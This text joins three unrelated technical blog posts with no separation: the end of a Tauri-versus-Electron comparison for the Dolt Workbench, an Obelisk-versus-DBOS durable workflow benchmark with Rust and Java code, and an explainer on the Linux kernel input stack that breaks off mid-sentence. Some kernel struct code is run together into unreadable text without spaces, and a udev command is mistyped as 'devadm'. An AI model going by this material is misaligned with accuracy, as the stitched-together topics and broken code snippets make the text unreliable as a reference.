In my experience, I found the Tauri APIs to fit more naturally in our application code. With Electron, if you need the main process to do something, you must always use inter-process communication, even for the simplest of tasks. If you want to write to a file on the host machine, for instance, your frontend needs to send a signal to the Electron main process, which will then spawn a new process and run the function you wrote that performs the write. With Tauri, you can just use Tauri’s filesystem API directly in your application code. Under the hood, the same sort of IPC pattern is happening, but I think the Tauri abstraction is a bit nicer.
Since Electron runs on Node.js, it also bundles a full Node.js runtime with your application. This comes with some pros and cons. For the workbench, specifically, this is beneficial because the GraphQL layer is itself a separate Node.js application that needs to run alongside the frontend. Since Electron ships with Node.js, this means we can directly spin up the GraphQL server from the Electron main process using the Node runtime. This eliminates a lot of the headache associated with bundling and running a typical sidecar process. For instance, our app also ships with a copy of Dolt, which allows users to start up local Dolt servers directly from the workbench. To make this work, we have to bundle the appropriate Dolt binary with each workbench release that corresponds to the correct architecture. Without the Node runtime, we’d have to do something similar for the GraphQL layer.
With Tauri, this is exactly the problem we run into. To get around it, we need to compile the GraphQL server into a binary using a tool like
pkg
, then run it as a sidecar the same way we run Dolt. Thankfully, this seems to be a fairly common use case for Tauri applications, and they have a useful guide on
how to run Node.js apps as a sidecar
.
It’s also worth mentioning that the full Node.js runtime is quite heavy, which also contributes to bloated Electron app sizes. After building the workbench using both Electron and Tauri, the difference in size was substantial. The left is the Electron version and the right is Tauri:
After replicating the workbench’s functionality in Tauri, we’re holding off on making the full transition for a couple reasons:
Lack of support for .appx and .msix bundles on Windows
- Currently, Tauri only support .exe and .msi bundles on Windows. This means your Microsoft Store entry will only link to the unpacked application. The workbench is currently bundled and published using the .appx format. To address this, we would need to take down the workbench entirely from the Microsoft store and create a new application that uses the .exe format.
Issues with MacOS universal binaries
- This is more an annoyance than a bug, but I ran into a few issues related to codesigning universal binaries for MacOS. Namely, Tauri doesn’t seem to be able to create Mac universal binaries from their arm64 and x64 subcomponents. It also seems to be codesigning the Mac builds twice.
Neither of these are hard blockers, but they’re annoying enough that I’m holding off on migrating until they’re resolved or our issues with Nextron become more problematic. For now, I’m leaving
my branch with the migration
open and hope to revisit soon. If you’re on the Tauri team, let us know if you have solutions!
Overall, I’m impressed with Tauri. It eliminates much of the classic Electron bloat and integrates naturally with our existing codebase. If you’re curious about Tauri or the Dolt Workbench, let us know on
Discord
.
Obelisk and
DBOS
are both open-source
durable workflow engines.
Let's see how they compare in terms of ease of use, nondeterminism prevention and performance.
I will go through the
Learn DBOS Java
tutorial
and compare it with Rust version of the same code written for Obelisk.
I chose Java because of familiarity, however the library has just been released so the code is still quite young.
On the Obelisk side, Rust is the obvious choice as it has the best
performance
and
tooling
.
Setting up the environment
DBOS-Java needs a JDK, Gradle and a PosgreSQL database.
For building WASM Components we need Rust and Cargo.
Intro into deterministic workflow engines
As both
Obelisk
and
DBOS
emphasize, workflows must be deterministic and activities / steps must be idempotent.
This ensures that long running workflows
can continue after a server crash or when they are migrated from one machine to another.
Activities can be retried automatically on a failure, but even a successful activity might
be retried if the server crashes just before persisting the result.
Our test bed will be:
An idempotent activity (step in DBOS lingo) that interacts with the world: sleeps and creates a file
A
serial
and
parallel
workflows that run the activity with persistent sleep in a loop
An HTTP endpoint (webhook endpoint in Obelisk lingo) that triggers these workflows.
package tutorial:activity;
interface activity-sleepy {
step: func(idx: u64, sleep-millis: u64) -> result<u64>;
}
world any {
export tutorial:activity/activity-sleepy;
}
use exports::tutorial::activity::activity_sleepy::Guest;
use std::time::Duration;
use wit_bindgen::generate;
generate!({ generate_all });
struct Component;
export!(Component);
impl Guest for Component {
fn step(idx: u64, sleep_millis: u64) -> Result<u64, ()> {
println!("Step {idx} started");
std::thread::sleep(Duration::from_millis(sleep_millis));
println!("Step {idx} creating file");
let path = format!("file-{idx}.txt");
std::fs::File::create(path)
.inspect_err(|err| eprintln!("{err:?}"))
.map_err(|_| ())?;
println!("Step {idx} completed");
Ok(idx)
}
}
Workflow
package tutorial:workflow;
interface workflow {
serial: func() -> result<u64>;
parallel: func() -> result<u64>;
}
world any {
export tutorial:workflow/workflow;
// Import of the activity.
import tutorial:activity/activity-sleepy;
// Generated extensions for `parallel` workflow.
import tutorial:activity-obelisk-ext/activity-sleepy;
// Obelisk SDK
import obelisk:types/execution@3.0.0;
import obelisk:workflow/workflow-support@3.0.0;
import obelisk:log/log@1.0.0;
}
use exports::tutorial::workflow::workflow::Guest;
use obelisk::{
log::log,
types::time::{Duration, ScheduleAt},
workflow::workflow_support::{self, ClosingStrategy, new_join_set_generated},
};
use std::collections::HashSet;
use tutorial::{
activity::activity_sleepy::step,
activity_obelisk_ext::activity_sleepy::{step_await_next, step_submit},
};
use wit_bindgen::generate;
mod util;
generate!({ generate_all });
struct Component;
export!(Component);
impl Guest for Component {
fn serial() -> Result<u64, ()> {
log::info("serial started");
let mut acc = 0;
for i in 0..10 {
log::info("Persistent sleep started");
workflow_support::sleep(ScheduleAt::In(Duration::Seconds(1)));
log::info("Persistent sleep finished");
let result = step(i, i * 200).inspect_err(|_| log::error("step timed out"))?;
acc += result;
log::info(&format!("step({i})={result}"));
}
log::info("serial completed");
Ok(acc)
}
#[allow(clippy::mutable_key_type)]
fn parallel() -> Result<u64, ()> {
log::info("parallel started");
let max_iterations = 10;
let mut handles = HashSet::new();
for i in 0..max_iterations {
let join_set = new_join_set_generated(ClosingStrategy::Complete);
step_submit(&join_set, i, i * 200);
handles.insert((i, join_set));
}
log::info("parallel submitted all child executions");
let mut acc = 0;
for (i, join_set) in handles {
let (_execution_id, result) =
step_await_next(&join_set).expect("every join set has 1 execution");
let result = result.inspect_err(|_| log::error("step timed out"))?;
acc = 10 * acc + result; // order-sensitive
log::info(&format!("step({i})={result}, acc={acc}"));
workflow_support::sleep(ScheduleAt::In(Duration::Milliseconds(300)));
}
log::info(&format!("parallel completed: {acc}"));
Ok(acc)
}
}
Webhook endpoint
package any:any;
world any {
import tutorial:workflow/workflow;
}
use crate::tutorial::workflow::workflow;
use anyhow::Result;
use wit_bindgen::generate;
use wstd::http::body::Body;
use wstd::http::{Error, Request, Response, StatusCode};
generate!({ generate_all });
#[wstd::http_server]
async fn main(request: Request<Body>) -> Result<Response<Body>, Error> {
let path = request.uri().path_and_query().unwrap().as_str();
let response = match path {
"/serial" => {
let acc = workflow::serial().unwrap();
Response::builder().body(Body::from(format!("serial workflow completed: {acc}")))
}
"/parallel" => {
let acc = workflow::parallel().unwrap();
Response::builder().body(Body::from(format!("parallel workflow completed: {acc}")))
}
_ => Response::builder()
.status(StatusCode::NOT_FOUND)
.body(Body::from("not found")),
}
.unwrap();
Ok(response)
}
Ergonomics
DBOS uses a callback approach when submitting child executions:
int result = DBOS.runStep(() -> step(i, 200 * i), "step " + i);
The drawback here is lower readability when orchestrating a large number of steps.
DBOS could use Proxy pattern instead,
but it would make more difficult to attach metadata such as name, retry configuration
etc.
Obelisk workflows can call a child execution directly without a callback:
let result = step(i, i * 200).unwrap();
or using
Extension Functions
,
automatically generated from the activity's WIT file:
step_submit(&join_set, i, i * 200);
let (_execution_id, result) = step_await_next(&join_set).unwrap();
The great thing about DBOS is that the whole thing fits into a single Java file.
However, schema-first approach has several advantages:
Strong, explicit interface contracts
No way of forgetting to use the callback style or to construct a proxy object.
This would lead to mixing side effects into workflows.
Cross-language interoperability: The WASM Component Model supports many languages such as
Rust, JavaScript, Python, Go and more.
Versioning and backward-compatibility: Activities can export several versions
of the same interface, enabling workflows to catch up on their pace.
Codegen allows creating multiple variants of the same exported function, taking
advangates of both proxy and callback patterns without the drawbacks.
Experiments
Experiment A: Simulating a server crash
The task is to start the workflow, kill the server and start it again to see if the workflow finishes.
Submitting the parallel workflow in DBOS and then killing the server
revealed an unplesent surprise: After restart the workflow ended in
ERROR
state, with an error and a huge stack trace:
However, after I
reported
the bug, the PR was merged within 24 hours. Kudos to the DBOS team.
Other than that, the only notable issue I found was that DBOS recovery started after around a one minute delay.
I was
instructed
to disable Conductor, a proprietary distributed orchestrator, which resolved the problem.
No problems with Obelisk were found.
Experiment B: Breaking determinism with code changes
Changing code of a running workflow is a delicate process. It can only work when the change does not affect
the execution log, or when the running execution did not reach the changed line yet.
One clever trick that DBOS does is that it detects code changes by
hashing the bytecode
of workflow classes. Obviously this is a best-effort solution, as the change can come from a dependency, or from
using a nondeterministic construct, as discussed later.
Instead of extracting the workflow logic into another file, I have disabled the hashing by setting a constant application version.
Obelisk does not currently perform a hash digest of the workflow's WASM executable. In the future, it will
store the WASM hash
when an execution is created. Contrary to DBOS, this approach reliably reflects whether the code (including dependencies) changed or not.
DBOS
should
throw an error when events produced on replay do not match the original execution log.
Let's start with an obvious change in the
serial
workflow:
public int serial() throws Exception {
...
- for (int i = 0; i < 10; i++) {
+ for (int i = 9; i >= 0; i--) {
// Note that the step name changed as well:
int result = DBOS.runStep(() -> step(i2, 200 * i2), "step " + i);
fn serial() -> Result<(), ()> {
...
- for i in 0..10 {
+ for i in (0..10).rev() {
// Call the activity with different parameters
let result = step(i, i * 200).unwrap();
An in-progresss execution that is replayed after restart should detect it immediately as the
i
variable
is used as a parameter to
step
invocation.
Both engines detect the failure:
Full error:
key does not match event stored at index 4:
key: ChildExecutionRequest(E_01KAJVHDX4VAPCPAXXZ2QCVWCZ.o:1_1.o:2-step_1, tutorial:activity/activity-sleepy.step, params: [9, 1800]),
event: JoinSetRequest(ChildExecutionRequest(E_01KAJVHDX4VAPCPAXXZ2QCVWCZ.o:1_1.o:2-step_1, tutorial:activity/activity-sleepy.step, params: [0, 0]))
Notice that the DBOS error only contains the naming differences,
step 0
vs
step 9
whereas Obelisk contains the actual parameters.
In fact, if we are a bit lazy, and do not serialize parameters into the name properly:
- int result = DBOS.runStep(() -> step(i2, 200 * i2), "step " + i);
+ int result = DBOS.runStep(() -> step(i2, 200 * i2), "step");
the workflow will finish happily with result 0+1+2+6+5+4+3+2+1+0=24!
Experiment C: Trimming execution events
Another interesting test is to lower the number of iterations.
Let's start a
serial
workflow, wait until around
step 8
, kill the server and change:
public void serial() throws Exception {
...
- for (int i = 0; i < 10; i++) {
+ for (int i = 0; i < 3; i++) {
...
int result = DBOS.runStep(() -> step(i2, 200 * i2), "step " + i);
This kind of error can lead to resources like temporary VMs running without a cleanup and should be reported by the engine.
The latest version of Obelisk detects it correctly:
found unprocessed event stored at index 18: event: JoinSetCreate(o:7-sleep)
DBOS marks the trimmed execution as successful, returning 0+1+2=3.
Full disclosure: Obelisk 0.26.2 did not detect these changes correctly, fixes landed for 0.27.0 .
Experiment D: Breaking determinism using nondeterministic code
Instead of changing the code, determinism can be broken by using nondeterministic constructs.
DBOS documentation
warns
:
Java's threading and concurrency APIs are non-deterministic. You should use them only inside steps.
Using any source of nondeterminism, including current date, IO, environment variables, RNG or something more subtle like hash maps will break the replay as well.
For posterity, let's replace the
ArrayList
/
Vec
with a hash set:
@Workflow(name = "parallel-parent")
public long parallelParent() throws Exception {
System.out.println("parallel-parent started");
- ArrayList<Map.Entry<Integer, WorkflowHandle<Integer, Exception>>> handles = new ArrayList<>();
+ HashSet<Map.Entry<Integer, WorkflowHandle<Integer, Exception>>> handles = new HashSet<>();
for (int i = 0; i < 10; i++) {
final int index = i;
var handle = DBOS.startWorkflow(
() -> this.proxy.childWorkflow(index),
new StartWorkflowOptions().withQueue(this.queue));
handles.add(new AbstractMap.SimpleEntry<>(i, handle)); // Tuple (i, handle)
}
System.out.println("parallel-parent submitted all parallel-child workflows");
long acc = 0;
for (var entry : handles) {
int result = entry.getValue().getResult();
acc = 10 * acc + result; // Order-sensitive
int i = entry.getKey();
System.out.printf("parallel-child(%d)=%d, acc:%d%n", i, result, acc);
DBOS.sleep(Duration.ofMillis(300));
}
System.out.println("parallel-parent completed");
return acc;
}
Crasing an in-progress workflow and replaying it in a new process:
parallel-parent started
parallel-parent submitted all parallel-child workflows
parallel-child(2)=2, acc:2
parallel-child(8)=6, acc:26
parallel-child(5)=8, acc:268
parallel-child(3)=5, acc:2685
parallel-child(4)=4, acc:26854
parallel-child(7)=9, acc:268549
parallel-child(1)=7, acc:2685497
parallel-child(9)=0, acc:26854970
# replayed up to this point
parallel-child(0)=0, acc:268549700
parallel-child(6)=6, acc:2685497006
parallel-parent completed: 2685497006
Noticed something is off?
parallel-child(n)
should always return
n
, and the final
acc
should contain every digit exactly once.
However the ordering of
HashSet
iteration depends on each object’s memory address or a per-run JVM-specific identity value.
This is an obvious source of nondeterminism, and in this case leads to replaying wrong return values, exactly as in Experiment B.
The best DBOS could do here is to throw a nondeterminism detected error.
Applying the same change in Obelisk:
fn parallel() -> Result<u64, ()> {
log::info("parallel started");
let max_iterations = 10;
- let mut handles = Vec::new();
+ let mut handles = HashSet::new();
for i in 0..max_iterations {
let join_set = new_join_set_generated(ClosingStrategy::Complete);
step_submit(&join_set, i, i * 200);
handles.insert((i, join_set));
}
log::info("parallel submitted all child executions");
let mut acc = 0;
for (i, join_set) in handles {
let (_execution_id, result) =
step_await_next(&join_set).expect("every join set has 1 execution");
let result = result.inspect_err(|_| log::error("step timed out"))?;
acc = 10 * acc + result; // order-sensitive
log::info(&format!("step({i})={result}, acc={acc}"));
workflow_support::sleep(ScheduleAt::In(Duration::Milliseconds(300)));
}
log::info(&format!("parallel completed: {acc}"));
Ok(acc)
}
I have crashed an execution twice, but its output is stable:
I am not aware of any way how to inject nondeterminism into the code:
Accessing IO, source of randomness, spawning a thread etc, are all forbidden
and lead to WASM trap (a non-recoverable runtime fault).
Even if there was a way to bypass the WASM sandbox, it would only lead to the
same result as we saw earlier with code changes - a nondeterminism detected error.
This experiment shows that without a properly isolated environment code that
works fine on the first run can be utterly broken on replay.
Experiment E: Resource usage with 10k or 100k of workflows
One of main selling points of workflow engines is the fact that the
workflows can durably sleep for weeks or more.
Let's model the situation where a main workflow spawns
one child workflow for every customer. This child workflow will just sleep for 1 day in order
to drive some business logic.
@Workflow
public void sleepyWorkflow(int idx) {
System.out.printf("%d%n", idx);
DBOS.sleep(Duration.ofDays(1));
// do some logic here
}
// Test submitting many customer workflows
@Workflow
public void sleepyParent(int max) {
var handles = new ArrayList<WorkflowHandle<Void, RuntimeException>>();
for (int i = 0; i < max; i++) {
final int index = i;
System.out.printf("Submitting child workflow %d%n", i);
var handle = DBOS.startWorkflow(
() -> this.proxy.sleepyWorkflow(index),
new StartWorkflowOptions().withQueue(this.queue));
handles.add(handle);
}
System.out.printf("Created %s child workflows%n", max);
int counter = 0;
for (var handle : handles) {
handle.getResult();
counter++;
System.out.printf("Collected %d child workflows%n", counter);
}
System.out.printf("Done waiting for %d child workflows%n", max);
}
When executing the parent workflow submitting 10k child workflows (on a machine wih 16GB of RAM), the JVM process was slowing down until it reached
a breaking point. After a few minutes, with parent workflow reporting the index 8602,
the process RSS grew from ~130MB to 1.3GB,
reported an OOM error and did not make any further progress.
Even after restart the same thing happened:
[172,701s][warning][os,thread] Failed to start thread "Unknown thread" - pthread_create failed (EAGAIN) for attributes: stacksize: 1024k, guardsize: 0k, detached.
[172,701s][warning][os,thread] Failed to start the native thread for java.lang.Thread "pool-1-thread-18613"
Exception in thread "QueuesPollThread" java.lang.OutOfMemoryError: unable to create native thread: possibly out of memory or process/resource limits reached
This could be mitigated by changing the limits on the OS level, but using one thread for each inactive workflow execution seems excessive.
fn sleepy_parent(max: u64) -> Result<(), ()> {
let join_set = &new_join_set_generated(ClosingStrategy::Complete);
for idx in 0..max {
log::info(&format!("Submitting child workflow {idx}"));
sleepy_workflow_submit(join_set, idx);
}
log::info(&format!("Created {max} child workflows"));
for counter in 0..max {
let (_execution_id, _result) = sleepy_workflow_await_next(join_set).unwrap();
log::debug(&format!("Collected {counter} child workflows"));
}
log::info(&format!("Done waiting for {max} child workflows"));
Ok(())
}
To make it a bit more challenging let's use
100k
child workflows.
Although Obelisk is yet not hardened for such scale, it managed to start all child workflows with RSS under 500MB.
Part of the reason is that instead of using native threads, each execution lives inside a light-weight
Tokio
task.
Inactive workflows are automatically unloaded from memory after a configurable time, which keeps the
memory footprint low.
Conclusion
Differences between DBOS and Obelisk can be summarized in a table.
Feature / Category
DBOS
Obelisk
Compared Language
Java
(Other languages: Python,TypeScript,Go are supported through their respective SDKs).
Rust
(Other languages supporting WASM Components: JavaScript, Python, Go)
Workflow Definition
Code-first:
Workflows and steps can reside in a single Java class.
Schema-first:
Uses WIT (WebAssembly Interface Type) IDL to define contracts between components.
Ergonomics
Uses a
callback approach
for steps (e.g.,
DBOS.runStep(...)
), which can lower readability.
Supports
direct function calls
or generated extension functions, offering cleaner syntax (e.g.,
step(...)
).
Determinism Enforcement
Manual/Cooperative:
Developers must avoid Java's non-deterministic APIs (threading, IO). Constructs like
HashSet
can break replay.
Strict/Sandboxed:
WASM sandbox prevents access to non-deterministic resources (IO, RNG).
HashSet
iteration is stable.
Code Change Detection
Best-effort:
Hashes bytecode of a class, but not the entire codebase. Failed to detect parameter changes if step names did not encode them; marked trimmed workflows as successful.
Strict:
reliably detects parameter mismatches and unprocessed events (e.g., trimmed events) on replay. Currently does not hash WASM files.
Execution Model
Thread-based:
Uses native threads for workflow executions.
Async/Task-based:
Uses lightweight Tokio tasks.
Scalability & Resource Usage
Lower Scalability:
Failed at
10k
concurrent workflows (OOM, 1.3GB RSS) due to thread exhaustion.
High Scalability:
Successfully handled
100k
concurrent workflows (<500MB RSS) by unloading inactive workflows.
Infrastructure Dependencies
Requires
PostgreSQL
.
Embeds
SQLite
.
DBOS is an interesting project that is very easy to start with, as it encourages developers to include it as a library
in their main application. This architectural decision shapes its features.
Since there is no isolation, determinism is managed by developer's discipline.
This may make it harder to review changes, as seemingly unrelated code changes can lead to (silent) determinism breakage.
Its code change detection can be improved, however it is simply impossible to prevent
accidental nondeterminisic constructs unless workflows are completely isolated
in a runtime that is built around deterministic execution.
On the plus side, DBOS requires no configuration, as workflows, steps and HTTP endpoints are just code.
Obelisk's main strenth is its WASM runtime:
no footguns (threads, IO, hash maps etc.) in workflows
WASM contains the entire code, so associating executions with is original codebase is trivial (although not implemented yet).
Able to unloaded running executions from memory transparently.
Separation of components
Coordination through WIT schemas
Easy to deploy on lightweight VM
The Input Stack on Linux An End-To-End Architecture Overview
Let’s explore and deobfuscate the input stack on Linux. Our aim is to
understand its components and what each does. Input handling can be
divided into two parts, separated by a common layer:
Kernel-level handling: It deals with what happens in the kernel and how events are exposed to user-space
The actual hardware connected to the machine, along with the different buses and I/O/transport subsystems
The input core subsystem, and the specific device drivers that register on it
Exposed layer (middle)
The event abstraction subsystem (evdev)
devtmpfs for device nodes
sysfs for kernel objects and device attributes
procfs for an introspection interface of the input core
User-space handling:
The user-space device manager (udev) and hardware database (hwdb) for device management and setup
The libinput library for general input, and other libraries such as
XKB for keyboards, to interpret the events and make them manageable
The Widgets, X Server, X11 window managers, and Wayland compositors,
which rely on everything else
We’ll try to make sense of all this, one thing at a time, with a logical
and coherent approach.
NB: This article compiles my understand, for any correction please
contact me.
The Kernel’s Input Core
How are input devices and their events handled in the kernel? You might
think it is useless to know, but understanding some of the kernel logic
is what makes things click.
The input core is the central piece of the kernel responsible for handling
input devices and their events. Most input devices go through it, although
some bypass it entirely but these are special use-cases. It provides
common abstract components that sit between the low-level hardware,
and the more useful features for user-space, along with a sort of
publish-subscribe system.
To follow along you can either download the kernel
source, or view it in any browser explorer (such as
this
,
this
,
or
this
).
Practically, the input core is found in the kernel under
drivers/input/input.c
, it defines the basic functionalities related
to the lifecycle of an input device, defined as a
struct input_dev
(
input.h
). Namely:
Allocating the input device structure (
input_allocate_device
that
returns a
struct input_dev
)
Registering and unregistering the input device in the system
along with setting sane default values
(
input_register_device
adds to
input_dev_list
). This also integrates with devtmpfs,
exposing the device, and with procfs, exposing debugging information
(
/proc/bus/input/
).
Drivers push events to the input core using
input_event
. The core then
forwards the events to the registered handlers in
a fan-out fashion (
input_register_handler
adds an
input_handler
to
input_handler_list
). Then handlers forward
them to all clients in user-space (called
input_handle
) listening
for events on that handler. The clients are registered on
the handler with
input_register_handle
(similar confusing names).
The user-space client/handle can also grab the handler with exclusivity
through
input_grab_device
(ex:
EVIOCGRAB
in evdev).
By default the evdev (event device) is attached as the default input
handler and exposes these events to user-space in a standardized way
via an evdev created character stream in devtmpfs (
/dev/input/eventX
).
An input handler is an implementation of an abstract interface
(
include/linux/input.h
), which the input core will call. Particularly,
the
input_event
function in input core will invoke the implementation
of the input handler’s
events
function. Here’s the interface an input
handler should fulfil:
Each actual specific input device driver builds on top of the functions of the
input core in their internal code, adding their own specificities and
advertising what capabilities and features the device can generate. This
creates a polymorphic-like abstraction where common input core logic is
reused, and where input event handlers are abstracted away. In general,
the main role of input drivers is to translate the device specific
protocol to a more standardized protocol, such as evdev, so that it can
be useful in user-space. And additionally, as with most drivers way of
communicating with the rest of the system, they can possibly have extra
configuration through an ioctl interface.
Along with all this, the kernel has a mechanism called sysfs that is
used to expose its internal objects (kobject) to user-space. Anytime
a device is created, it is exposed in
/sys/
(usually mounted there)
with its properties (
/sys/devices/
). For the input core part, we can
find it in
/sys/class/input/inputN
, and within each sub-directories
we have the properties of the object.
Furthermore, when a device is plugged or unplugged (
device_add
,
device_remove
in
drivers/base/core.c
), the kernel also emits events,
called uevent, via netlink (
PF_NETLINK, NETLINK_KOBJECT_UEVENT
) which
can then be caught in user-space and acted upon. We’ll see later how
these are handled by udev.
This is a general overview of our understanding of the input core so far:
The Logical Input Device Topological Path
We may commonly say that devices are connected to a machine and magically
handled from there on. Yet, we know that it’s an abstraction and that
there’s more to it. What happens in reality is that the electrical
connection first passes over a bus/host controller, which then let’s the
data be transported. This data is formatted in a specific input protocol
that should be handled by a driver that speaks it and that subsequently
creates a related input device. In most input device cases, the driver
then translates the protocol into evdev
“common speech”
.
That’s a whole layer of things before reaching the input core. Just like
in the world of networking, one thing wraps another. In this particular
case, devices have parents, a hierarchy, a stack of devices, drivers,
and helpers.
Here’s what that stack is like in theory, with in reality some lines
blurred together:
In this section, let’s try to understand how the kernel uses
plug’n’play/hotplug to pick the right drivers in this stack, and how we
pass from electrical signal to evdev. To do that we’ll first look at
how the kernel pictures its internal objects, and how these together
somehow create the above hierarchy. Finally, we’ll see some concrete
examples of that, along with some command line tools that can clearly
display this encapsulating behavior.
As we said there’s a hierarchy of kobjects in the kernel from the bus
to its connected devices. These are stored in-memory as a linked list
hierarchy, which is also represented under sysfs as a file system tree.
Specifically, in
drivers/base/core.c
this is what is used to create
the parent-child relationship:
/devices/...
— root of the kernel’s sysfs device tree, showing all devices known to the kernel.
pci0000:00/0000:00:14.0
— PCI bus and controller (the USB host controller here).
usb1/1-1/1-1:1.0
— USB bus and port hierarchy (device 1-1, interface 1.0).
0003:046D:C31C.0003
— HID device node (bus
0003
= USB HID, vendor
046D
= Logitech, product
C31C
= specific keyboard).
input/input6
— input subsystem device registered under
/sys/class/input/input6
.
event3
— the evdev interface, the character device exposed in
/dev/input/event3
.
How did we end up with this long list, how did it get created? Let’s see
how the kernel stores this info, and what happens from its perpective.
As far as its concerned, the device-related things it knows is summed
up in these types of objects:
bus - a device to which other devices can be attached
device - a physical/logical device that is attached to a bus
driver - a software entity that can be associated with a device and
performs operations with it
class - a type of device that has similar behavior; There is a class
for disks, partitions, serial ports, input, etc.
subsystem - a view on the structure of the system; Kernel subsystems
include devices (hierarchical view of all devices in the system), buses
(bus view of devices according to how they are attached to buses),
classes, input, etc. We care about the input subsystem.
For example, there are different views of the same device. You’ll find
the physical USB device under
/sys/bus/usb/devices/
and the logical
device of the input class under
/sys/class/input/.
Let’s go over these objects, tracing the path, starting with buses.
A hardware bus/host controler is a communication channel between the
processor and input/output device. But a kernel bus object is more
generic than this, it’s a logical function which role is to be a point
of connection of devices. All devices are connected to a kernel bus,
even if it needs to be a virtual one. So kernel buses are the root of
the hierarchy.
The main buses are things such as PCI, USB, IDE, SCSI, platform,
ACPI, etc.
Kernel buses are the connective tissue of everything, the base of the
infrastructure. As you can see from the structure it’s responsible for
probing the device to get info about it, handling connected/disconnected
events, creating a new node for it, and sending uevent to notify
user-space and triggering a chain reaction.
Yet, one of their most important role is to start the match between
devices and registered device drivers, as can be noted from the
match
function. Keep in mind that the matched driver can be another bus, so
this initiates a cascade of different handlers, bubbling up the hierarchy.
A concrete example of this recursion:
A PCI bus controller (the host bridge) is a device on the platform bus.
The USB bus (usbcore) is a device on the PCI bus (via xHCI controller).
The HID bus is a device on the USB bus (via usbhid).
The specific HID protocol driver is a device on the HID bus
The low level kernel buses such as the hardware bus/host controlers
generally don’t handle input data directly, though there are some bus/host
controller drivers that do register input devices to the input core,
bypassing everything else in the stack and acting as event sources. These
exceptions are usually for brightness control hotkeys, lid sensors,
built-in special functions keys, etc.. We have for example the drivers
acpi_video
,
thinkpad_acpi
,
asus_wmi
, etc..
To know how to handle the devices and whether a driver needs to be loaded
from a module, all devices and buses have specially formatted IDs, to
tell us what kind of devices they are. The ID, which we call MODALIAS,
consists of vendor and product ID with some other subsystem-specific
values. Each bus and device has its own scheme for these IDs.
For a USB mouse, it looks something like this:
This is needed in case the driver isn’t built-in the kernel and instead
was an external module (
*.ko
). As a reminder, a driver is some piece
of code responsible for handling a type of device, and a module is a
piece of external kernel code that can be dynamically loaded at runtime
when needed. Depending on the distro choices, some drivers are set as
external modules that need to be loaded at runtime.
To achieve this, the kernel, after composing the MODALIAS string, sends
it within the uevent towards user-space. To complete this information,
each external kernel module comes with a list of known MODALIASes it can
handle, so that they can be loaded as needed. These lists are compiled
by programs such as
depmod
that creates files like
modules.alias
in the kernel’s
/lib/modules
directory for all currently available
modules that aren’t built-in (
/lib/modules/VERSION
), and the built-in
ones (
modules.builtin
).
In theory that’s fine, this infrastructure model makes it easy to
dynamically load modules that are not already built-in, but we need
a piece of software in user-space to catch the events and perform the
actual loading. This is a role that udev embodies by calling
modprobe
for every event that has a MODALIAS key, regardless of whether a module
needs loading or not. We’ll see more of udev but for now keep in mind
that its doing this hotplug mechanism.
If you’re curious, you can try this udev command to monitor the MODALIAS.
devadm monitor --property
Yet, this doesn’t solve what happens to devices that were present at
boot and which need modules. The solution: there’s a file in the device
directory in sysfs with all the uevent generated at boot for every
devices in sysfs file system, appropriately named “uevent”. If you write
“add” to that file the kernel resends the same events as the one lost
during boot. So a simple loop over all uevent files in
/sys
triggers
all events again.
The MODALIAS value is also stored in sysfs along with the device
properties, here are a few commands to gather information on this:
> cat /sys/devices/pci0000:00/0000:00:10.0/modalias
pci:v00001022d00007812sv00001025sd00000756bc0Csc03i30
> modprobe --resolve-alias $(cat /sys/devices/\
pci0000:00/0000:00:13.2/usb1/1-0:1.0/usb1-port3/modalias)
Not everything has an associated module
> ls -l /sys/devices/pci0000:00/0000:00:10.0/driver
lrwxrwxrwx 1 root root 0 Oct 25 11:37 driver \
-> ../../../bus/pci/drivers/xhci_hcd
If the driver link exists, check which module implements it:
> modprobe -R xhci_hcd
xhci_hcd
> modinfo xhci_hcd
name: xhci_hcd
filename: (builtin)
license: GPL
file: drivers/usb/host/xhci-hcd
author: Sarah Sharp
description: 'eXtensible' Host Controller (xHC) Driver
license: GPL
file: drivers/usb/host/xhci-hcd
description: xHCI sideband driver for secondary interrupter management
parm: link_quirk:Don't clear the chain bit on a link TRB (int)
parm: quirks:Bit flags for quirks to be enabled as default (ullong)
For example that xhci_hcd module is builtin
So far we’ve learned two things: buses which devices are connected to,
and the MODALIAS mechanism to match modules and dynamically load drivers
that aren’t built-in. Let’s see the devices attached to buses as they
appear as kernel objects.
structdevice{// …structdevice*parent;structdevice_private*p;structkobjectkobj;constchar*init_name;/* initial name of the device */// …structbus_type*bus;/* type of bus device is on */structdevice_driver*driver;/* which driver has allocated this
device */// …conststructclass*class;// …void(*release)(structdevice*dev);};
Along with the related driver:
structdevice_driver{constchar*name;structbus_type*bus;structdriver_private*p;structmodule*owner;constchar*mod_name;/* used for built-in modules */int(*probe)(structdevice*dev);int(*remove)(structdevice*dev);void(*shutdown)(structdevice*dev);int(*suspend)(structdevice*dev,pm_message_tstate);int(*resume)(structdevice*dev);};
As you can notice, they also have a probing and lifecycle functions to
be implemented. We also have the registration/unregistration functions
(
input_register_device
and
input_unregister_device
in our case)
which will announce that the device is now available in the system (plus
a uevent and other user-space stuff). Each of the registered devices
have an entry in sysfs
/sys/devices
, along with the information about
its driver, and similar info in
/sys/class
and
/sys/bus
. The
device also creates files in devtmpfs that represent its interfaces. Let’s
note that devtmpfs is usually mounted by default to user-space as a virtual
filesystem on most distros.
To check whether devtmpfs is enabled, which is almost always the case today:
> zcat /proc/config.gz | grep DEVTMPFS
CONFIG_DEVTMPFS=y
CONFIG_DEVTMPFS_MOUNT=y
CONFIG_DEVTMPFS_SAFE=y
> mount | grep devtmpfs
dev on /dev type devtmpfs (rw,nosuid,relatime,size=2720672k,\
nr_inodes=680168,mode=755,inode64)
> mount | grep sysfs
sys on /sys type sysfs (rw,nosuid,nodev,noexec,relatime)
Devices are associated to classes and subsystems that handle them.
The subsystem we care about here is what we’ve seen in the earlier
section: the input core, the input device subsystem.
subsys_initcall(input_init);
As for the concept of a class, it’s a high-level view of the device
model, abstracting implementation details. For example there are drivers
for SCSI and ATA but both are in the disks class. Similarly, all input
devices are in the input class, which is what we care about. This is
a grouping mechanism, unrelated to how the devices are connected. They
can be found in sysfs
/sys/class/
.
The
struct class
is instantiated in the
struct device
through
class_register
and
class_unregister
. This will in turn also help
udev, as we’ll see later, better manage the devices in devtmpfs user-space
mapping
/dev/
, adding a filter for rules.
This completes our overview of the way the kernel perceives the different
types of objects it manages. However, that didn’t clarify how we ended
up with the example path above other than somehow having a kernel bus and
device hierarchy.
We talked about hardware buses and host controllers drivers that aren’t
handling data and that they delegate this to an upper layer. In theory
this upper layer is split between a kernel bus&device for the transport
layer, aka IO layer, and a kernel bus&device for the protocol layer,
